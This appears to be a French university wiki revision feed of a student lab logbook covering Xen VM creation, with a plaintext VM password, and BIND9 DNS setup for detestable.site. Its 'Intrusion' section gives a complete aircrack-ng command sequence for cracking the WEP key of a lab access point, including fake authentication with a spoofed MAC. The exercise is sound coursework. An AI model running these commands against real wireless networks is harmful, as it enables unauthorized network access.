  → Modifier les serveurs de noms pour utiliser &amp;lt;code&amp;gt;ns.detestable.site&amp;lt;/code&amp;gt; et &amp;lt;code&amp;gt;ns6.gandi.net&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
En attendant que les serveurs de noms soient correctement modifiés, il est possible de changer les enregistrements DNS :&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Modifier l’enrgistrement DNS &amp;lt;code&amp;gt;@&amp;lt;/code&amp;gt;-&amp;lt;code&amp;gt;A&amp;lt;/code&amp;gt; avec la valeur &amp;lt;code&amp;gt;193.48.57.193&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Ajouter l’enrgistrement DNS &amp;lt;code&amp;gt;ns&amp;lt;/code&amp;gt;-&amp;lt;code&amp;gt;A&amp;lt;/code&amp;gt; avec la valeur &amp;lt;code&amp;gt;193.48.57.193&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Modifier l’enrgistrement DNS &amp;lt;code&amp;gt;www&amp;lt;/code&amp;gt;-&amp;lt;code&amp;gt;CNAME&amp;lt;/code&amp;gt; avec la valeur &amp;lt;code&amp;gt;ns.detestable.site.&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Installation du paquet &amp;lt;code&amp;gt;bind9&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;apt install bind9&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/resolv.conf&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;nameserver 127.0.0.1&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.local&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;zone &amp;amp;quot;detestable.site&amp;amp;quot; {&lt;br /&gt;
    type master;&lt;br /&gt;
    file &amp;amp;quot;/etc/bind/db.detestable.site&amp;amp;quot;;&lt;br /&gt;
    allow-transfer { 217.70.177.40; }; // ns6.gandi.net&lt;br /&gt;
};&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.options&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;options{&lt;br /&gt;
  directory &amp;amp;quot;/var/cache/bind&amp;amp;quot;;&lt;br /&gt;
  forwarders {&lt;br /&gt;
    8.8.8.8;&lt;br /&gt;
    4.4.2.2;&lt;br /&gt;
  };&lt;br /&gt;
  dnssec-validation auto;&lt;br /&gt;
  listen-on-v6 { any; };&lt;br /&gt;
  allow-transfer { &amp;amp;quot;allowed_to_transfer&amp;amp;quot;; };&lt;br /&gt;
};&lt;br /&gt;
acl &amp;amp;quot;allowed_to_transfer&amp;amp;quot; {&lt;br /&gt;
  217.70.177.40/32;&lt;br /&gt;
};&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Créer le fichier BIND pour &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;cp /etc/bind/db.local /etc/bind/db.detestable.site&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/db.detestable.site&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;;&lt;br /&gt;
; BIND data file for detestable.site&lt;br /&gt;
;&lt;br /&gt;
$TTL    604800&lt;br /&gt;
@       IN      SOA     ns.detestable.site. root.detestable.site. (&lt;br /&gt;
                              3         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
;&lt;br /&gt;
@   IN  NS  ns.detestable.site.&lt;br /&gt;
@   IN  NS  ns6.gandi.net.&lt;br /&gt;
@   IN  A   193.48.57.163&lt;br /&gt;
NS  IN  A   193.48.57.163&lt;br /&gt;
NS  IN  AAAA    2001:660:4401:60a0:216:3eff:fe82:3e78&lt;br /&gt;
WWW IN  CNAME   NS&lt;br /&gt;
SSH IN  CNAME   NS&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Redémarrage du service &amp;lt;code&amp;gt;bind9&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;service bind9 restart&amp;lt;/pre&amp;gt;&lt;br /&gt;
=== Tester DNS : ===&lt;br /&gt;
&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/resolv.conf&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;nameserver 193.48.57.163&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Vérification de la traduction du nom de domaine &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;nslookup detestable.site&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= Intrusion =&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== WEP ==&lt;br /&gt;
&lt;br /&gt;
Pour casser une clé WEP il nous faut le logiciel Aircrack:&lt;br /&gt;
 apt-get install aircrack-ng&lt;br /&gt;
&lt;br /&gt;
Il faut tout d'abord se mettre sur la bonne interface ethernet:&lt;br /&gt;
 airmon-ng start wlan0mon&lt;br /&gt;
&lt;br /&gt;
On se met ensuite en écoute sur ce réseau en indiquant le cryptage (WEP)&lt;br /&gt;
 airodump-ng --encrypt wep wlan0mon&lt;br /&gt;
&lt;br /&gt;
On recupere ensuite l'ESSID et le BSSID correspondant a notre groupe (Groupe 1)&lt;br /&gt;
&lt;br /&gt;
(Ne pas juger la qualité du photographe)&lt;br /&gt;
[[Fichier:WEP_Liste.jpg]]&lt;br /&gt;
&lt;br /&gt;
On s'identifie&lt;br /&gt;
 aireplay-ng -9 -e cracotte01 -a 04:DA:D2:9C:50:50 wlan0mon&lt;br /&gt;
&lt;br /&gt;
Nous recuperons ensuite les VI que l'on stock dans un fichier qui nous permettera de casser la clé :&lt;br /&gt;
 airodump-ng -c 4 --bssid 04:DA:D2:9C:50:50 -w output wlan0mon&lt;br /&gt;
&lt;br /&gt;
Nous procédons maintenant a la fausse identification: &lt;br /&gt;
 aireplay-ng -1 0 -e cracotte01 -a 04:DA:D2:9C:50:50 -h 40:A5:EF:01:21:80 wlan0mon&lt;br /&gt;
&lt;br /&gt;
Il ne reste plus qu'a lancer le crack de la clé &lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:50 output*.cap&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Resultat: &lt;br /&gt;
&lt;br /&gt;
[[Fichier:cléWEP.jpeg]]&lt;/div&gt;</summary>
		<author><name>Hguyard</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_SE2a5_2022/2023_G1&amp;diff=60048</id>
		<title>TP sysres SE2a5 2022/2023 G1</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_SE2a5_2022/2023_G1&amp;diff=60048"/>
				<updated>2022-11-28T09:40:17Z</updated>
		
		<summary type="html">&lt;p&gt;Hguyard : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
&lt;br /&gt;
== Cahier de suivi - Groupe 1 ==&lt;br /&gt;
= Sommaire =&lt;br /&gt;
&lt;br /&gt;
* [[#plan-dadressage|Plan d’adressage]]&lt;br /&gt;
* [[#machine-virtuelle|Machine Virtuelle]]&lt;br /&gt;
&lt;br /&gt;
= Plan d’adressage =&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! VLAN !!  Réseau IPv4 !! Réseau IPv6 !! @IPv4 virtuelle !! IPv4/IPv6 6509E (E304) !! IPv4/IPv6 C9200 (E306) !! IPv4/IPv6 ISR4331 !!SSID !! VM !! @IPv4 MV non routée !! @IPv4 MV  routée !! Nom de domaine !&lt;br /&gt;
|-&lt;br /&gt;
| Antonin / Hugo || 20 || 10.20.0.0/16 || - || 10.20.0.250 || 10.20.0.251 || 10.20.0.252 || 10.20.0.253 || - || HG || 172.26.145.76/24 || 193.48.57.163/28 || detestable.site&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= Machine Virtuelle =&lt;br /&gt;
&lt;br /&gt;
== Création de la VM ==&lt;br /&gt;
&lt;br /&gt;
Pour créer la VM nous avons besoin de nous connecter sur Capbreton qui est le serveur qui va &amp;quot;heberger&amp;quot; notre VM xen&lt;br /&gt;
 ssh root@capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
On crée ensuite notre vm avec :&lt;br /&gt;
 xen-create-image --hostname=HG --gateway=193.48.57.175 --ip=193.48.57.163 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
Pour acceder à la console de notre vm il faut modifier le fichier de configuration de notre VM (/etc/xen/HG.cfg) en y rajoutant :&lt;br /&gt;
 vif=['mac=00:16:3E:82:3E:78,bridge=IMA2a5' ]&lt;br /&gt;
&lt;br /&gt;
On crée 2 LVM permettant par la suite d'y rattacher notre /home et notre /var :&lt;br /&gt;
 lvcreate -L10G -n HG-home storage&lt;br /&gt;
 lvcreate -L10G -n HG-var storage&lt;br /&gt;
&lt;br /&gt;
Dans /etc/xen/HG.cfg :&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-home,xvdb1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-var,xvdc1,w',&lt;br /&gt;
              ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour demarrer notre VM nous utilisons :&lt;br /&gt;
 xen create /etc/xen/HG.cfg -c&lt;br /&gt;
&lt;br /&gt;
Le -c sert a se connecter directement &lt;br /&gt;
&lt;br /&gt;
Une fois sur la console de la machine, on modifie /etc/fstab, qui gère le mount des partitions au démarrage. On y rajoute les deux entrées suivantes:&lt;br /&gt;
 /dev/xvda3 /home ext4 defaults	0 2&lt;br /&gt;
 /dev/xvda4 /var  ext4 defaults	0 2&lt;br /&gt;
&lt;br /&gt;
On modifie également les partitions /dev/xvda3 et /dev/xvda4 en y ajoutant des filesystems de type ext4:&lt;br /&gt;
 mkfs.ext4 /dev/xdva3&lt;br /&gt;
&lt;br /&gt;
== Serveur DNS ==&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, on utilise le registrar [[gandi.net|Gandi]] afin de réserver le nom de domaine &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt;.&amp;lt;br /&amp;gt;&lt;br /&gt;
Une fois le nom de domaine réservé, il est alors possible de configurer les serveurs de noms et les Glue Records :&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Ajouter le Glue Record vers &amp;lt;code&amp;gt;193.48.57.163&amp;lt;/code&amp;gt; afin d’associer le nom de domaine &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt; à l’adresse IP &amp;lt;code&amp;gt;193.48.57.163&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Modifier les serveurs de noms pour utiliser &amp;lt;code&amp;gt;ns.detestable.site&amp;lt;/code&amp;gt; et &amp;lt;code&amp;gt;ns6.gandi.net&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
En attendant que les serveurs de noms soient correctement modifiés, il est possible de changer les enregistrements DNS :&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Modifier l’enrgistrement DNS &amp;lt;code&amp;gt;@&amp;lt;/code&amp;gt;-&amp;lt;code&amp;gt;A&amp;lt;/code&amp;gt; avec la valeur &amp;lt;code&amp;gt;193.48.57.193&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Ajouter l’enrgistrement DNS &amp;lt;code&amp;gt;ns&amp;lt;/code&amp;gt;-&amp;lt;code&amp;gt;A&amp;lt;/code&amp;gt; avec la valeur &amp;lt;code&amp;gt;193.48.57.193&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Modifier l’enrgistrement DNS &amp;lt;code&amp;gt;www&amp;lt;/code&amp;gt;-&amp;lt;code&amp;gt;CNAME&amp;lt;/code&amp;gt; avec la valeur &amp;lt;code&amp;gt;ns.detestable.site.&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Installation du paquet &amp;lt;code&amp;gt;bind9&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;apt install bind9&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/resolv.conf&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;nameserver 127.0.0.1&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.local&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;zone &amp;amp;quot;detestable.site&amp;amp;quot; {&lt;br /&gt;
    type master;&lt;br /&gt;
    file &amp;amp;quot;/etc/bind/db.detestable.site&amp;amp;quot;;&lt;br /&gt;
    allow-transfer { 217.70.177.40; }; // ns6.gandi.net&lt;br /&gt;
};&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.options&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;options{&lt;br /&gt;
  directory &amp;amp;quot;/var/cache/bind&amp;amp;quot;;&lt;br /&gt;
  forwarders {&lt;br /&gt;
    8.8.8.8;&lt;br /&gt;
    4.4.2.2;&lt;br /&gt;
  };&lt;br /&gt;
  dnssec-validation auto;&lt;br /&gt;
  listen-on-v6 { any; };&lt;br /&gt;
  allow-transfer { &amp;amp;quot;allowed_to_transfer&amp;amp;quot;; };&lt;br /&gt;
};&lt;br /&gt;
acl &amp;amp;quot;allowed_to_transfer&amp;amp;quot; {&lt;br /&gt;
  217.70.177.40/32;&lt;br /&gt;
};&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Créer le fichier BIND pour &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;cp /etc/bind/db.local /etc/bind/db.detestable.site&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/db.detestable.site&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;;&lt;br /&gt;
; BIND data file for detestable.site&lt;br /&gt;
;&lt;br /&gt;
$TTL    604800&lt;br /&gt;
@       IN      SOA     ns.detestable.site. root.detestable.site. (&lt;br /&gt;
                              3         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
;&lt;br /&gt;
@   IN  NS  ns.detestable.site.&lt;br /&gt;
@   IN  NS  ns6.gandi.net.&lt;br /&gt;
@   IN  A   193.48.57.163&lt;br /&gt;
NS  IN  A   193.48.57.163&lt;br /&gt;
NS  IN  AAAA    2001:660:4401:60a0:216:3eff:fe82:3e78&lt;br /&gt;
WWW IN  CNAME   NS&lt;br /&gt;
SSH IN  CNAME   NS&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Redémarrage du service &amp;lt;code&amp;gt;bind9&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;service bind9 restart&amp;lt;/pre&amp;gt;&lt;br /&gt;
=== Tester DNS : ===&lt;br /&gt;
&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/resolv.conf&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;nameserver 193.48.57.163&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Vérification de la traduction du nom de domaine &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;nslookup detestable.site&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= Intrusion =&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== WEP ==&lt;br /&gt;
&lt;br /&gt;
Pour casser une clé WEP il nous faut le logiciel Aircrack:&lt;br /&gt;
 apt-get install aircrack-ng&lt;br /&gt;
&lt;br /&gt;
Il faut tout d'abord se mettre sur la bonne interface ethernet:&lt;br /&gt;
 airmon-ng start wlan0mon&lt;br /&gt;
&lt;br /&gt;
On se met ensuite en écoute sur ce réseau en indiquant le cryptage (WEP)&lt;br /&gt;
 airodump-ng --encrypt wep wlan0mon&lt;br /&gt;
&lt;br /&gt;
On recupere ensuite l'ESSID et le BSSID correspondant a notre groupe (Groupe 1)&lt;br /&gt;
&lt;br /&gt;
(Ne pas juger la qualité du photographe)&lt;br /&gt;
[[Fichier:WEP_Liste.jpg]]&lt;br /&gt;
&lt;br /&gt;
On s'identifie&lt;br /&gt;
 aireplay-ng -9 -e cracotte01 -a 04:DA:D2:9C:50:50 wlan0mon&lt;br /&gt;
&lt;br /&gt;
Nous recuperons ensuite les VI que l'on stock dans un fichier qui nous permettera de casser la clé :&lt;br /&gt;
 airodump-ng -c 4 --bssid 04:DA:D2:9C:50:50 -w output wlan0mon&lt;br /&gt;
&lt;br /&gt;
Nous procédons maintenant a la fausse identification: &lt;br /&gt;
 aireplay-ng -1 0 -e cracotte01 -a 04:DA:D2:9C:50:50 -h 40:A5:EF:01:21:80 wlan0mon&lt;br /&gt;
&lt;br /&gt;
Il ne reste plus qu'a lancer le crack de la clé &lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:50 output*.cap&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Resultat: &lt;br /&gt;
&lt;br /&gt;
[[Fichier:cléWEP.jpeg]]&lt;/div&gt;</summary>
		<author><name>Hguyard</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=Fichier:Cl%C3%A9WEP.jpeg&amp;diff=60046</id>
		<title>Fichier:CléWEP.jpeg</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=Fichier:Cl%C3%A9WEP.jpeg&amp;diff=60046"/>
				<updated>2022-11-28T09:37:53Z</updated>
		
		<summary type="html">&lt;p&gt;Hguyard : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>Hguyard</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_SE2a5_2022/2023_G1&amp;diff=60045</id>
		<title>TP sysres SE2a5 2022/2023 G1</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_SE2a5_2022/2023_G1&amp;diff=60045"/>
				<updated>2022-11-28T09:37:43Z</updated>
		
		<summary type="html">&lt;p&gt;Hguyard : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
&lt;br /&gt;
== Cahier de suivi - Groupe 1 ==&lt;br /&gt;
= Sommaire =&lt;br /&gt;
&lt;br /&gt;
* [[#plan-dadressage|Plan d’adressage]]&lt;br /&gt;
* [[#machine-virtuelle|Machine Virtuelle]]&lt;br /&gt;
&lt;br /&gt;
= Plan d’adressage =&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! VLAN !!  Réseau IPv4 !! Réseau IPv6 !! @IPv4 virtuelle !! IPv4/IPv6 6509E (E304) !! IPv4/IPv6 C9200 (E306) !! IPv4/IPv6 ISR4331 !!SSID !! VM !! @IPv4 MV non routée !! @IPv4 MV  routée !! Nom de domaine !&lt;br /&gt;
|-&lt;br /&gt;
| Antonin / Hugo || 20 || 10.20.0.0/16 || - || 10.20.0.250 || 10.20.0.251 || 10.20.0.252 || 10.20.0.253 || - || HG || 172.26.145.76/24 || 193.48.57.163/28 || detestable.site&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= Machine Virtuelle =&lt;br /&gt;
&lt;br /&gt;
== Création de la VM ==&lt;br /&gt;
&lt;br /&gt;
Pour créer la VM nous avons besoin de nous connecter sur Capbreton qui est le serveur qui va &amp;quot;heberger&amp;quot; notre VM xen&lt;br /&gt;
 ssh root@capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
On crée ensuite notre vm avec :&lt;br /&gt;
 xen-create-image --hostname=HG --gateway=193.48.57.175 --ip=193.48.57.163 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
Pour acceder à la console de notre vm il faut modifier le fichier de configuration de notre VM (/etc/xen/HG.cfg) en y rajoutant :&lt;br /&gt;
 vif=['mac=00:16:3E:82:3E:78,bridge=IMA2a5' ]&lt;br /&gt;
&lt;br /&gt;
On crée 2 LVM permettant par la suite d'y rattacher notre /home et notre /var :&lt;br /&gt;
 lvcreate -L10G -n HG-home storage&lt;br /&gt;
 lvcreate -L10G -n HG-var storage&lt;br /&gt;
&lt;br /&gt;
Dans /etc/xen/HG.cfg :&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-home,xvdb1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-var,xvdc1,w',&lt;br /&gt;
              ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour demarrer notre VM nous utilisons :&lt;br /&gt;
 xen create /etc/xen/HG.cfg -c&lt;br /&gt;
&lt;br /&gt;
Le -c sert a se connecter directement &lt;br /&gt;
&lt;br /&gt;
Une fois sur la console de la machine, on modifie /etc/fstab, qui gère le mount des partitions au démarrage. On y rajoute les deux entrées suivantes:&lt;br /&gt;
 /dev/xvda3 /home ext4 defaults	0 2&lt;br /&gt;
 /dev/xvda4 /var  ext4 defaults	0 2&lt;br /&gt;
&lt;br /&gt;
On modifie également les partitions /dev/xvda3 et /dev/xvda4 en y ajoutant des filesystems de type ext4:&lt;br /&gt;
 mkfs.ext4 /dev/xdva3&lt;br /&gt;
&lt;br /&gt;
== Serveur DNS ==&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, on utilise le registrar [[gandi.net|Gandi]] afin de réserver le nom de domaine &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt;.&amp;lt;br /&amp;gt;&lt;br /&gt;
Une fois le nom de domaine réservé, il est alors possible de configurer les serveurs de noms et les Glue Records :&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Ajouter le Glue Record vers &amp;lt;code&amp;gt;193.48.57.163&amp;lt;/code&amp;gt; afin d’associer le nom de domaine &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt; à l’adresse IP &amp;lt;code&amp;gt;193.48.57.163&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Modifier les serveurs de noms pour utiliser &amp;lt;code&amp;gt;ns.detestable.site&amp;lt;/code&amp;gt; et &amp;lt;code&amp;gt;ns6.gandi.net&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
En attendant que les serveurs de noms soient correctement modifiés, il est possible de changer les enregistrements DNS :&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Modifier l’enrgistrement DNS &amp;lt;code&amp;gt;@&amp;lt;/code&amp;gt;-&amp;lt;code&amp;gt;A&amp;lt;/code&amp;gt; avec la valeur &amp;lt;code&amp;gt;193.48.57.193&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Ajouter l’enrgistrement DNS &amp;lt;code&amp;gt;ns&amp;lt;/code&amp;gt;-&amp;lt;code&amp;gt;A&amp;lt;/code&amp;gt; avec la valeur &amp;lt;code&amp;gt;193.48.57.193&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Modifier l’enrgistrement DNS &amp;lt;code&amp;gt;www&amp;lt;/code&amp;gt;-&amp;lt;code&amp;gt;CNAME&amp;lt;/code&amp;gt; avec la valeur &amp;lt;code&amp;gt;ns.detestable.site.&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Installation du paquet &amp;lt;code&amp;gt;bind9&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;apt install bind9&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/resolv.conf&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;nameserver 127.0.0.1&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.local&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;zone &amp;amp;quot;detestable.site&amp;amp;quot; {&lt;br /&gt;
    type master;&lt;br /&gt;
    file &amp;amp;quot;/etc/bind/db.detestable.site&amp;amp;quot;;&lt;br /&gt;
    allow-transfer { 217.70.177.40; }; // ns6.gandi.net&lt;br /&gt;
};&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.options&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;options{&lt;br /&gt;
  directory &amp;amp;quot;/var/cache/bind&amp;amp;quot;;&lt;br /&gt;
  forwarders {&lt;br /&gt;
    8.8.8.8;&lt;br /&gt;
    4.4.2.2;&lt;br /&gt;
  };&lt;br /&gt;
  dnssec-validation auto;&lt;br /&gt;
  listen-on-v6 { any; };&lt;br /&gt;
  allow-transfer { &amp;amp;quot;allowed_to_transfer&amp;amp;quot;; };&lt;br /&gt;
};&lt;br /&gt;
acl &amp;amp;quot;allowed_to_transfer&amp;amp;quot; {&lt;br /&gt;
  217.70.177.40/32;&lt;br /&gt;
};&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Créer le fichier BIND pour &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;cp /etc/bind/db.local /etc/bind/db.detestable.site&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/db.detestable.site&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;;&lt;br /&gt;
; BIND data file for detestable.site&lt;br /&gt;
;&lt;br /&gt;
$TTL    604800&lt;br /&gt;
@       IN      SOA     ns.detestable.site. root.detestable.site. (&lt;br /&gt;
                              3         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
;&lt;br /&gt;
@   IN  NS  ns.detestable.site.&lt;br /&gt;
@   IN  NS  ns6.gandi.net.&lt;br /&gt;
@   IN  A   193.48.57.163&lt;br /&gt;
NS  IN  A   193.48.57.163&lt;br /&gt;
NS  IN  AAAA    2001:660:4401:60a0:216:3eff:fe82:3e78&lt;br /&gt;
WWW IN  CNAME   NS&lt;br /&gt;
SSH IN  CNAME   NS&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Redémarrage du service &amp;lt;code&amp;gt;bind9&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;service bind9 restart&amp;lt;/pre&amp;gt;&lt;br /&gt;
=== Tester DNS : ===&lt;br /&gt;
&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/resolv.conf&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;nameserver 193.48.57.163&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Vérification de la traduction du nom de domaine &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;nslookup detestable.site&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= Intrusion =&lt;br /&gt;
&lt;br /&gt;
